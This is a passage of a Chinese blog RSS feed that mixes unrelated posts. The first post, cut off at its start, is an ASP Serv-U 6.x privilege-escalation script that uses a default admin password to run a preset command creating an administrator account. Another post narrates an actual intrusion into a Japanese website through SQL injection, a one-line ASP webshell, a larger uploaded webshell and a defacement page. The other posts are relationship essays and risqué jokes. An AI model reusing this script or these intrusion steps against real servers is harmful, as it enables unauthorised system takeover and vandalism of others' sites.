id="u" value="&lt;%=user%&gt;"&gt;&lt;/td&gt;<BR>&lt;input name="p" type="hidden" id="p" value="&lt;%=pass%&gt;"&gt;&lt;/td&gt;<BR>&lt;input name="port" type="hidden" id="port" value="&lt;%=port%&gt;"&gt;&lt;/td&gt;<BR>&lt;input name="c" type="hidden" id="c" value="&lt;%=cmd%&gt;" size="50"&gt;<BR>&lt;input name="f" type="hidden" id="f" value="&lt;%=f%&gt;" size="50"&gt;<BR>&lt;input name="action" type="hidden" id="action" value="3"&gt;&lt;/form&gt;<BR>&lt;script language="javascript"&gt;<BR>document.write('&lt;center&gt;正在提升权限,请等待...,&lt;center&gt;');<BR>setTimeout("document.all.leaves.submit();",4000);<BR>&lt;/script&gt;<BR>&lt;%<BR>case 3<BR>set c=Server.CreateObject("Microsoft.XMLHTTP")<BR>c.open "GET", "<A href="http://127.0.0.1">http://127.0.0.1</A>:" &amp; port &amp; "/leaves/upadmin/s3", True, "", ""<BR>c.send loginuser &amp; loginpass &amp; mt &amp; deldomain &amp; quit<BR>set session("c")=c<BR>%&gt;<BR>&lt;center&gt;提权完毕,已执行了命令：<BR>&lt;font color=red&gt;&lt;%=cmd%&gt;&lt;/font&gt;</P>
<P>&lt;input type=button value=" 返回继续 " onClick="location.href='&lt;%=gname()%&gt;';"&gt;<BR>&lt;/center&gt;</P>
<P>&lt;%<BR>case else<BR>on error resume next<BR>set a=session("a")<BR>set b=session("b")<BR>set c=session("c")<BR>a.abort<BR>Set a = Nothing<BR>b.abort<BR>Set b = Nothing<BR>c.abort<BR>Set c = Nothing<BR>%&gt;<BR>&lt;center&gt;&lt;form method="post" name="leaves"&gt;<BR>&lt;tr align="center" valign="middle"&gt;<BR>&lt;td colspan="2"&gt;Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆&lt;/td&gt;</P>
<P>&lt;/tr&gt;<BR>&lt;tr align="center" valign="middle"&gt;<BR>&lt;td width="200"&gt;用户名:&lt;/td&gt;</P>
<P>&lt;td width="400"&gt;&lt;input name="u" type="text" id="u" value="LocalAdministrator"&gt;&lt;/td&gt;</P>
<P>&lt;/tr&gt;<BR>&lt;tr align="center" valign="middle"&gt;<BR>&lt;td&gt;口　令：&lt;/td&gt;</P>
<P>&lt;td&gt;&lt;input name="p" type="text" id="p" value="<A href='mailto:#l@$ak#.lk;0@P"></td'>#l@$ak#.lk;0@P"&gt;&lt;/td</A>&gt;</P>
<P>&lt;/tr&gt;<BR>&lt;tr align="center" valign="middle"&gt;<BR>&lt;td&gt;端　口：&lt;/td&gt;</P>
<P>&lt;td&gt;&lt;input name="port" type="text" id="port" value="43958"&gt;&lt;/td&gt;</P>
<P>服务器端口：</P>
<P>&lt;td&gt;&lt;input name="ffport" type="text" id="ffport" value="65500"&gt;&lt;/td&gt;</P>
<P>服务器IP：</P>
<P>&lt;td&gt;&lt;input name="iip" type="text" id="iip" value="0.0.0.0"&gt;&lt;/td&gt;</P>
<P>&lt;/tr&gt;<BR>&lt;tr align="center" valign="middle"&gt;<BR>&lt;td&gt;系统路径：&lt;/td&gt;</P>
<P>&lt;td&gt;&lt;input name="f" type="text" id="f" value="&lt;%=f%&gt;" size="8"&gt;&lt;/td&gt;</P>
<P>&lt;/tr&gt;<BR>&lt;tr align="center" valign="middle"&gt;<BR>&lt;td&gt;命　令：&lt;/td&gt;</P>
<P>&lt;td&gt;&lt;input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add &amp; net localgroup administrators leaves /add" size="50"&gt;&lt;/td&gt;</P>
<P>&lt;/tr&gt;<BR>&lt;tr align="center" valign="middle"&gt;<BR>&lt;td colspan="2"&gt;&lt;input type="submit" name="Submit" value="提交"&gt;<BR>&lt;input type="reset" name="Submit2" value="重置"&gt;<BR>&lt;input name="action" type="hidden" id="action" value="1"&gt;&lt;/td&gt;<BR>&lt;/tr&gt;<BR>&lt;/form&gt;&lt;/center&gt;</P>
<P>使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在“服务器端口”里填21，然后再在“服务器IP”中填写服务器的真实IP。<BR>&lt;% end select<BR>function Gpath()<BR>on error resume next<BR>err.clear<BR>set f=Server.CreateObject("Scripting.FileSystemObject")<BR>if err.number&gt;0 then<BR>gpath="c:"<BR>exit function<BR>end if<BR>gpath=f.GetSpecialFolder(0)<BR>gpath=lcase(left(gpath,2))<BR>set f=nothing<BR>end function<BR>Function GName()<BR>If request.servervariables("SERVER_PORT")="80" Then<BR>GName="http://" &amp; request.servervariables("server_name")&amp;lcase(request.servervariables("script_name"))<BR>Else<BR>GName="http://" &amp; request.servervariables("server_name")&amp;":"&amp;request.servervariables("SERVER_PORT")&amp;lcase(request.servervariables("script_name"))<BR>End If<BR>End Function<BR>%&gt; <BR></P></div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/4191824020083374716391</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/4191824020083374716391</guid>
    <pubDate>Thu, 3 Apr 2008 19:47:16 +0800</pubDate>
    <dcterms:modified>2008-04-03T19:47:16+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[男女人偷情有哪“三怕”]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/41918240200811435351625</link>
    <description><![CDATA[<div><TABLE style="TABLE-LAYOUT: fixed; WORD-BREAK: break-all; WORD-WRAP: break-word" height="100%" width="99%" align=center border=0>
<TBODY>
<TR>
<TD vAlign=top>
<TABLE style="TABLE-LAYOUT: fixed" height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD style="WORD-BREAK: break-all" vAlign=top>男人偷情最怕当真，如果情人很在乎他了，那男人的惬意也就蒙上了一层阴影。男人偷情三怕说：“找个没结婚的，怕粘着；找个结了婚的，怕逮着；找个不三不四的，怕染着。”正是因为如此，才会性情男人才会“小姐太贵，情人太累”之感叹。网友霁说：“婚外恋是危险的。如果你的妻子爱你，你也爱你的妻子，请控制你的感情。不要轻信一个女人会甘心做你的情人，她迟早会为爱疯狂，伤害到你和你的家人。你真的想爱两个女人最好的办法就是不结婚。”<BR><BR>　　不仅男人偷情三怕，而女人也有偷人三怕——找个没结婚的，怕人家认真；找个结了婚的，怕自己认真；找个不三不四的，又怕纠缠过分。被一个没结过婚的男人粘着是件麻烦事，被一个已婚男人爱上也是件麻烦事，最最麻烦的是自己也深深地爱上了这个男人。爱情、道德、婚姻犹如一团麻，剪不断，理还乱。同时陷入绝对的热情中情人，双方都会失去自由，在圆满成为不可能时，死亡便会成为情人最好的解脱。网友草仙子说：“一个聪明的女人，不会去选择做男人的情人。做情人太累，不会让你感到轻松透明，因为爱了，所以想得到、想索取，而男女如果有了想从彼此身上换取什么的欲望，关系就不会清澈明朗。”?<BR><BR>　　男人偷情，目的为性，女人偷情性情交融。偷情对于男人来说，偷的就是偷的，偷到以后便不觉得那么珍惜了。而女人则往往错位，她们往往希望拥有偷的东西。一个跟自己“外甥女”偷情的男人，当“小情人”以怀孕要挟，要么与离婚，要么殉情。这个男人在日记中说：“我早晚就要毁到这个女人手里。”很多男人在偷情之后，都要面临情人纠缠不清的苦恼。官场情人太累的原因在于：腐败的男人背后，一定站着一个或几个性情贪婪的女人。很多官员为了摆脱养情人的纠缠，而不惜挪用公款，贪污受贿。为了剪断婚外的情丝，往往让一些男人不惜铤而走险，雇凶杀害纠缠不清的情人。<BR><BR>　　男人身累，女人心累。又一女士跑到情夫的家中诉苦说：“气死我了，那个小妖精又跑到我家里来了。”情夫说：“那有什么？你不是也跑到我家里来了吗？”女士说：“我看八成是那个小妖精爱上我丈夫了。那我们该怎么办？！”这是一个笑话，笑话的背后很能说明一个问题。男人出轨多为性，而女人在性投实的同时，人也被偷走。丢了身，也丢了心。楚江南说：“女人在一起时常贬低男人不懂爱情，实事求是地说男人在性的方面的确比女人现实，女人上床要以感情为基础，男人爱女人只与青春美貌有关，其他的一切最好免谈。<BR><BR>　　男人婚外恋起来没什么负担，拿得起放得下，回家对老婆还能装无辜，女人就不行了，女人一旦着火那可就没救了。女人爱谁就总想跟谁结婚，为谁去死，男人爱谁顶多送她一点礼物，说一些事后自己一点都回忆不起来的话。”情人说：“妻子最幸福，因为她天天能和你在一起”；当妻子说：“对你再好，也不如人家不对你好。”女人是家庭的统治者，妻子控制男人，情人征服男人，而男人往往是被控制和征服的承受者。男人同女人的关系，应该以性为界，在没性之前，女人对你的爱是单纯的，性尽管能提升男女关系，但是也能让男女关系变质。<BR><BR>　　老宣说：“同女子交往，你若不同她发生深切的关系，她始终觉得对你有短处；你若同她发生关系，终觉得你对她有短处。你的短处，纵然将身上的肉，全割下来，也填补不满。”男人为性卤莽，女人为情轻率。男人跟别的女人温柔之后，依然可以跟自己的女人兴趣不减。虚情也好，假意也罢，除了冷血之类，男人在外“余粮”之后，公粮依旧，场面不亚于“龙江精神”。梁晓生说：“男人‘求爱’，乃是一种手段，有时仅仅为了一次或几次‘做爱’的许可。”女人为情，往往不顾一切，什么工作，什么家庭，什么亲情……都可以不顾。女人别看平时胆小如鼠，可一旦为情杀人的时候，往往心狠如蝎，犹如一部电视剧中的台词所说“子女和丈夫对我无所谓”。<BR><BR>　　为了爱，女人往往比男子更勇敢、更执着，更敢蔑视主流文化和传统，无视家庭、社会等方面的压力。女人一旦移情别恋，常常破釜沉舟，不知回头。为了自己所谓的爱情，女人在人财两空之后，依然爱得无怨无悔。为了爱，她们不顾事业前程，也不惜与父母、子女反目，甘愿牺牲自己的一切。一些人即使在自己的爱情已成黄梁一梦时，依然苦苦地等待，乃至终身不婚。女性大多把爱当作生活，从而痴迷地、忘情地投入，在爱情的围墙里越险越深，直到筋疲力尽。<BR><BR>　　女人往往很难把性和情绝对的分离，传统女人不像一般男子那样“没爱也性、没情也性”。传统女人只有在自己的感情需求获得满足时才愿意付出，达到性情相融、灵肉合一。偷情是一剂鸦片，与性结合后往往让痴迷的女人上瘾。张惠妹《无悔》中唱到：“就算无酒，我也饮醉，就一生算是无悔，并不会为你垂泪。” </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/41918240200811435351625</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/41918240200811435351625</guid>
    <pubDate>Thu, 14 Feb 2008 15:53:51 +0800</pubDate>
    <dcterms:modified>2008-02-14T15:53:51+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[艰难的日本网站入侵之旅]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/419182402007101785454455</link>
    <description><![CDATA[<div>一、旅途开始&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;群里有位兄弟发话说，你们这些家伙天天研究那些什么漏洞，想着怎么去黑掉别人，不觉得没意思么，有本事黑几个日本站去！虽然有点过激但也不无道理。我虽然是菜菜，不过也要去看看有没有本事黑几个日本站去。 <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;二、撒网捉鱼&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;操起啊D，打开google，输入关键字"asp?id="，每页显示设100页，语言为日文，一顿狂注之后出来N多注入点，如图1。随便找了一个，检测一下，发现可以注入，如图2。按照常规的方法先猜猜表猜猜列什么的，不过用猜出的用户名和密码登录后发现后台无法利用。而且日文我也看不懂，后台利用的方式应该行不通了。好在是SQL注入，权限又是DB_OWNER，只要能列出WEB目录，还是有希望搞的。于是试着列了下目录，发现可以正常列出来，如图3。下一步就是找WEB目录了，打开网站看看，哪些文件在上面能访问到，如图4。然后用啊D列目录，通过上面的文件的一致性来确定哪个目录才是WEB目录。初步确定F盘为网站目录所在盘，再进一步列目录后最终确定WEB根目录为：F:\JR???????????satsueki.jp?\，虽然看起来怪怪的，但这个的确是WEB根目录，如图5。 <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;三、瓮中捉鳖&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;好了，万事俱备，只欠东风了。这所谓的东风就是利用DB_OWNER的注入权限通过LOG备份的方式写入一句话小马。手工也可以，用工具也可以，我就用工具了。这里推荐用GetWebshellah56bug大众版。需要的信息有：注入点、注入类型、当前数据库、WEB路径。这些信息在用啊D检测的时候都已经有了，全部填好之后如图6。木马代码默认是一句话&lt;%%25Execute(request("ah"))%%25&gt;，%25就代表是空格。然后从第一步到第六步，不过点击的时候不要太快，一般控制在返回注入点页面的时候再点下一步就可以了。然后我们再访问一句话所在的页面，WEB目录下的x.asp就是一句话藏身之处了。我们访问它，如图7。页面底部有出错信息，一般看到这样的一句话就已经成功写进去的了。然后再用ASP+PHP两用Shell连接我们的一句话木马，提交环境变量。虽然返回的页面有点乱，但是已经连接成功的了，我们可以看到返回了服务器上的一些信息，如图8。 <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;四、山穷水复&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;本来以为这次入侵到这里就应该快结束的了。可能大家都会先想用一句话上传小马，再用小马上传大马就可以了。可是并没有这么简单，用一句话上传小马的时候却返回出错了，没有成功写入。后来发现目录根本不可写。于是就换了几个目录，发现大部分目录都没有写权限，无法写入ASP马。那时候真想放弃了，不过想到群里那位兄弟说的话，不敢放弃啊。我就不信它上面没有一个可写的目录！经过半小时左右的查找终于发现了：F:&amp;amp;#92;JR???????????satsueki.jp?&amp;amp;#92;shop&amp;amp;#92;img目录下可写！接下来当然是上传大马了。不过为了使返回的页面清楚一点，我在这个目录下重新写进了一句话，然后通过一句话上传大马，提示上传文件成功了。我们现在去访问可爱的大马，结果出现了意外！因为并没有看到登录入口，只看到了几行可恶的出错提示，如图9！郁闷啊，当时真还以为马太大了，传的时候造成代码损坏了而导致出错呢。可是传了几次，还是一样的结果。又以为是语言的问题，就找了英文版的海阳传上去还是一样。问朋友要了十几个马传上去访问还是出错！连海阳的C/S端提交都出错，一句话专用提交的也试过了，还是不行！“郁闷”这两个字的意思那一刻我终于彻底明白了！&nbsp; <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;五、柳暗花明&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;万般无奈之下，唯有向他人求助了。于是上邪恶八进制发了帖求救，一会儿就有位朋友来帮忙了。他告诉我在ASP马的第一行加上&lt;%@&nbsp;LANGUAGE=VB&nbsp;codepage&nbsp;="936"&nbsp;%&gt;这么一行代码。我照着做了，在ASP马的最前面加上那一句代码，再传上去。然后访问，这一回看到了可爱的登录入口了（在此感谢邪八的hc3w朋友），如图10。至此webshell已经拿到了，如图11。但进去之后发现很多文件的确都是只读权限，连首页都改不了，就在可写目录传了个黑页，如图12。这个服务器上还有几十个日本网站，不过都是只读权限的，虽然有可写目录，但也不一一传黑页了。 <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;六、反思&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;入侵结束了，但是那个加一行代码的问题，我当时还没有搞明白。搞定网站之后我去查了些资料。那行代码中936是一个叫代码页（所谓代码页(code&nbsp;page)就是针对一种语言文字的字符编码。例如GBK的code&nbsp;page是CP936，BIG5的code&nbsp;page是CP950，GB2312的code&nbsp;page是CP20936）的一个代号，表示简体中文。950就是繁体中文，932就是日文。这个只要记住936是我们用的就可以，以后如果遇到网页文件出现乱码的情况可以试着加那一行代码，就能正常解释成简体中文的了。菜菜一个，写错的地方请大家批评指正，我会经常上X的论坛逛的哦…… </div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/419182402007101785454455</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/419182402007101785454455</guid>
    <pubDate>Sat, 17 Nov 2007 20:54:54 +0800</pubDate>
    <dcterms:modified>2007-11-17T20:54:54+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[什么叫老公 (女士必看,男士更要看)]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/4191824020079141188841</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">&nbsp;</P>
<P style="TEXT-INDENT: 2em">
<TABLE cellSpacing=0 cellPadding=0>
<TBODY>
<TR>
<TD>老公,就是那个怕你的工作餐带得不够，又悄悄往饭盒里添菜的“坏男人”。&nbsp;
<P></P>
<P style="TEXT-INDENT: 2em">　　　　<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;老公，就是那个你将碗里吃剩的饭像倒垃圾一样倒进他碗里，而他还吃得像小猪一样欢天喜地的“傻男人”&nbsp;。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个白天吵架不理你、闹得不可开交，而半夜为你拉好踢开的被角的“小气男人”<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个钱包里只剩300大洋，却全力劝你买下700大洋你看中的一件衣服，帮你刷卡而自己顾不得买条领带的“笨男人”。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;老公，就是那个你偷懒跟他撒娇，要他为你倒水洗脚而明知中计还乐不可滋中套的“可爱男人”&nbsp;。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个冬天怕你脚冷，而将你一双没有洗的脚紧紧抱在怀里的那个不怕臭的男人，简称“臭男人”&nbsp;。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个吃了你放多了盐和辣椒的菜一边擤鼻涕一边猛喝茶，还不忘流着泪摇头晃脑说:老婆做的菜真好吃的“可怜男人”&nbsp;。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;老公，就是那个星期六早晨你睡眼蒙胧去卫生间，他突然从门角跳出来抱你将你吓一大跳的“可恨男人”&nbsp;。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个你“老朋友</A>”来时，默默为你泡好红糖水，帮你买卫生巾时怕被熟人看见而匆忙间抓错东西抱头鼠蹿回来挨骂的“倒霉男人”&nbsp;。<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个陪你吃饭、陪你逛街、陪你回家、过马路紧紧牵着你小手的“****男人”&nbsp;。<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个下雨时将自己外套脱下，用胳膊为你遮风挡雨自己一身湿的“大男人”&nbsp;。<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">　　　　女人，记住：老公，就是那个不让你吃亏的男人。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个让你有了他而不屑看其他</A>男人一眼的男人。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;老公，就是那个一向吝啬的你，舍得在他身上花钱而竟然不心痛的男人。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;老公，就是那个让你星期六早晨放弃睡懒觉，而甘愿起床为他和他家人做早餐的男人。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;老公，就是那个让从前心高气傲不食人间烟火的你，变成现在单位、家庭两点一线贤妻良母的男人。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;老公，就是那个看到别人的脏衣服都觉恶心，却将他穿一星期未换黑不见底的臭袜子洗得雪白而毫无怨言的男人。&nbsp;　　　　老公，就是那个你不顾一切阻力，为他受尽一切屈辱再穷再苦也心甘情愿跟他厮守一生的男人。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个让从不懂节约大手大脚的你，变成现在和菜贩子坦然砍价，宁愿多走二站路赶公共汽车的男人。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个让你每个空余时间都希望有他陪伴，出差后让你掰着指头数归期的男人。<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个让你因为他感冒而心痛得流泪，看到他多吃一碗饭而开心的男人。&nbsp;<WBR></P>
<P style="TEXT-INDENT: 2em">　　　　老公，就是那个让在家烧饭你看到天外下了雨，而丢下一切拿起伞去给他送伞的男人。<WBR>&nbsp;</P>
<P style="TEXT-INDENT: 2em">　　　　女人，记住：<WBR>老公，就是那个你舍不得给他亏吃的男人,那如果你舍得让他吃亏,让他难过,让他为了你..................<WBR>...&nbsp;</P></TD></TR></TBODY></TABLE></P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/4191824020079141188841</comments>
    <slash:comments>1</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/4191824020079141188841</guid>
    <pubDate>Sun, 14 Oct 2007 11:08:08 +0800</pubDate>
    <dcterms:modified>2007-10-14T11:08:08+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[现在的女孩满脑子都是色情]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/4191824020079751259927</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">会错意(一)</P>
<P style="TEXT-INDENT: 2em">下午coffeetime,总经理走近四个女同事旁,“美丽小姐儿们,要不要猜谜啊？</P>
<P style="TEXT-INDENT: 2em">嘻嘻……好啦注意听,猜人身上的东西：上面有毛,下面也有毛,晚上就来个毛对毛。”</P>
<P style="TEXT-INDENT: 2em">“唉呀呀,总经理好色,人家不来了啦！”</P>
<P style="TEXT-INDENT: 2em">“喂喂,别想歪了,答案是‘眼睛’”</P>
<P style="TEXT-INDENT: 2em">会错意(二)</P>
<P style="TEXT-INDENT: 2em">打卡时,总经理对女同事们说：“美丽的小姐们！要不要来个脑筋急转弯？”众脂粉们心想,又来了。</P>
<P style="TEXT-INDENT: 2em">听好喔：“什么东西最硬？女孩子最喜欢,特别是结了婚的女人,更是爱死了。脑筋急转弯！开始！”众脂粉们又开始脸红了,低头都想走开。</P>
<P style="TEXT-INDENT: 2em">“喂喂！还没说出答案啊？”“不来了啦,总经理你最色了啦！”</P>
<P style="TEXT-INDENT: 2em">“喂喂！又想到哪去了？</P>
<P style="TEXT-INDENT: 2em">答案是【钻石】啦！”</P>
<P style="TEXT-INDENT: 2em">会错意(三)</P>
<P style="TEXT-INDENT: 2em">“总经理！今天不玩猜谜啦？”</P>
<P style="TEXT-INDENT: 2em">“这个很难猜,你们一定猜不出来。”</P>
<P style="TEXT-INDENT: 2em">“哼？谁说的？”众小姐们不服输地娇嗔着。</P>
<P style="TEXT-INDENT: 2em">好！那仔细听好。</P>
<P style="TEXT-INDENT: 2em">猜人类的一种东西：“一种玩意儿,可长可短,西方人比较长,东方人比较短。”</P>
<P style="TEXT-INDENT: 2em">众小姐又开始脸红了,开始故作娇羞状。</P>
<P style="TEXT-INDENT: 2em">“唉呀！讨厌啦！再给一些提示嘛？”</P>
<P style="TEXT-INDENT: 2em">“好好,提示：结婚后,妻子就可用丈夫的这个东西。”</P>
<P style="TEXT-INDENT: 2em">“唉呀呀,为什么结婚前就不能用？”一位稍八婆的mm挑逗问道。“如果硬要用,会让人耻笑：成何体统？”</P>
<P style="TEXT-INDENT: 2em">“唉呀！讨厌啦！再给一些提示嘛”众小姐又在故作矜持。</P>
<P style="TEXT-INDENT: 2em">“好好,提示：出家人都不会用它。”</P>
<P style="TEXT-INDENT: 2em">“那…那……尼姑会想到用它吗？”那mm再问。</P>
<P style="TEXT-INDENT: 2em">“尼姑也不用,她们用更长更长的东东。”</P>
<P style="TEXT-INDENT: 2em">“哇！哇？”众小姐发出无比羡慕渴望的娇呼声。</P>
<P style="TEXT-INDENT: 2em">“怎样？猜不出来吧？很难猜,你们就不信。”</P>
<P style="TEXT-INDENT: 2em">“它是不是有时大？有时小？”还是那个mm在问。</P>
<P style="TEXT-INDENT: 2em">“嗯？？没错！当看他比较大,你就说他是：【大】那个;如果看他比较小,你就说他是：【小】那个,像最近打职棒的就用大小来分。”</P>
<P style="TEXT-INDENT: 2em">“唉呀呀！好下流,用【这个】来分？”众小姐低声议论纷纷。</P>
<P style="TEXT-INDENT: 2em">众小姐早已认定答案就是“那个”,只是羞得说不出口。</P>
<P style="TEXT-INDENT: 2em">忽见窗外,董事长座车驶进大门了,众小姐赶紧要回位子了。</P>
<P style="TEXT-INDENT: 2em">“喂喂！们还没猜出来啊？”</P>
<P style="TEXT-INDENT: 2em">“唉呀！不来了啦！总经理好色！”</P>
<P style="TEXT-INDENT: 2em">“喂喂！想到哪去了！答案是姓名的【姓】啊”</P>
<P style="TEXT-INDENT: 2em">会错意(四)</P>
<P style="TEXT-INDENT: 2em">总经理又在玩猜谜的玩意儿。</P>
<P style="TEXT-INDENT: 2em">“各位美丽的小姐儿们,猜个谜语吧？猜人身上的一种东西：</P>
<P style="TEXT-INDENT: 2em">舔也硬,不舔也硬,要舒服睡觉,先搓搓它”</P>
<P style="TEXT-INDENT: 2em">众小姐又开始脸红了……</P>
<P style="TEXT-INDENT: 2em">“唉呀！不来了啦！总经理好色！”</P>
<P style="TEXT-INDENT: 2em">“喂喂！想到哪儿去了！答案是【牙齿】啦。”</P>
<P style="TEXT-INDENT: 2em">会错意(五)</P>
<P style="TEXT-INDENT: 2em">“各位美丽的小姐儿们,猜个谜语吧？仔细听好猜一句成语喔！总不会再想歪了吧：</P>
<P style="TEXT-INDENT: 2em">心里很想要,好想要,好兴奋,又想得要命,结果洞口就慢慢开始流出水来了。”</P>
<P style="TEXT-INDENT: 2em">“唉呀！妈呀！这么不要脸的总经理。”小姐们心里如此骂着！</P>
<P style="TEXT-INDENT: 2em">“怎样？猜不到了吧！嘿嘿</A>嘿！”</P>
<P style="TEXT-INDENT: 2em">“那个…那个是不是会张很开？”38婆故作羞赧地问道。</P>
<P style="TEXT-INDENT: 2em">“没错！而且都一直大大张开着。而且水流得更多。”</P>
<P style="TEXT-INDENT: 2em">“讨厌啦！讨厌啦！不来了啦！总经理好色。”</P>
<P style="TEXT-INDENT: 2em">“喂喂！猜不来就别乱讲,答案是【垂涎三尺】啦。”</P>
<P style="TEXT-INDENT: 2em">会错意(七)</P>
<P style="TEXT-INDENT: 2em">“嗨！美丽的小姐儿们！”</P>
<P style="TEXT-INDENT: 2em">“总经理好！今天还要猜谜吗？”</P>
<P style="TEXT-INDENT: 2em">“不啦！每次都说我好色,不要了啦！”总经理满脸无辜样子。</P>
<P style="TEXT-INDENT: 2em">“好嘛好嘛！我们不说就是了嘛。”</P>
<P style="TEXT-INDENT: 2em">“那么,今儿来猜一种【人的动作】。”</P>
<P style="TEXT-INDENT: 2em">“仔细听好：【下班以后最想做的事,一根硬梆梆的长条东西,直直地插进洞里,快的话,两下就好了。不然就抽出来,再插进去。不达目的绝不终止。猜猜看是什么？“</P>
<P style="TEXT-INDENT: 2em">“唉呀！夭寿啊！还说不色？这次这么粗鲁下流”众小姐都作如是想。</P>
<P style="TEXT-INDENT: 2em">小姐们的脸一个比一个还红,真是假装羞死了。“小孩子可不可以做？”38婆又问了。</P>
<P style="TEXT-INDENT: 2em">“最好不要,出事大人要负责的。”</P>
<P style="TEXT-INDENT: 2em">“白天晚上都可以吗？”还是38婆在问。</P>
<P style="TEXT-INDENT: 2em">嗯！通常都在晚上,白天也可以。不过白天看得较清楚,晚上乌漆妈黑的,好一边摸着,一边再插进去。</P>
<P style="TEXT-INDENT: 2em">“哇！还说不色！”小姐们一边脸红,一边闷声嗤笑。</P>
<P style="TEXT-INDENT: 2em">“还猜不出来？好吧！再给提示：最好不要发生那种让别人胡乱插进去的事,否则要出事的！”</P>
<P style="TEXT-INDENT: 2em">“讨厌！不来了啦！总经理好色。”</P>
<P style="TEXT-INDENT: 2em">“喂喂！猜不来就不要乱栽赃抹黄！答案是：——“钥匙开门”啊！哈！”</P>
